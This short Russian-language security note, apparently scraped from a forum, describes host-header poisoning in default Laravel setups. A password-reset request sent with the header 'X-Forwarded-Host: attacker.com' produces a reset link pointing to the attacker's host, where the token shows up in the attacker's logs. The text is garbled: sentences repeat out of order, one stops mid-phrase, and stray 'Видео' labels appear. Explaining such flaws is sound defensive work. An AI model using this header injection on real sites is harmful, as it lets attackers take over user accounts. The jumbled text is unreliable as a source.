Приложения на Laravel, при настройках по умолчанию, уязвимы к подмене имени хоста через
К примеру, отправляя запрос на сброс пароля, добавив при этом заголовок
Кликнув в письме на которую, атакующий в логах может увидеть токен для сброса пароля.
Видео
X-Forwarded-Host, так как считают значение заголовка доверенным. К примеру, отправляя запрос на сброс пароля, добавив при этом заголовок
X-Forwarded-Host: attacker.com, на почту пользователю придет ссылка вида:
Код:
https://attacker.com/reset-password/<reset-token>?email=user@example.comВидео
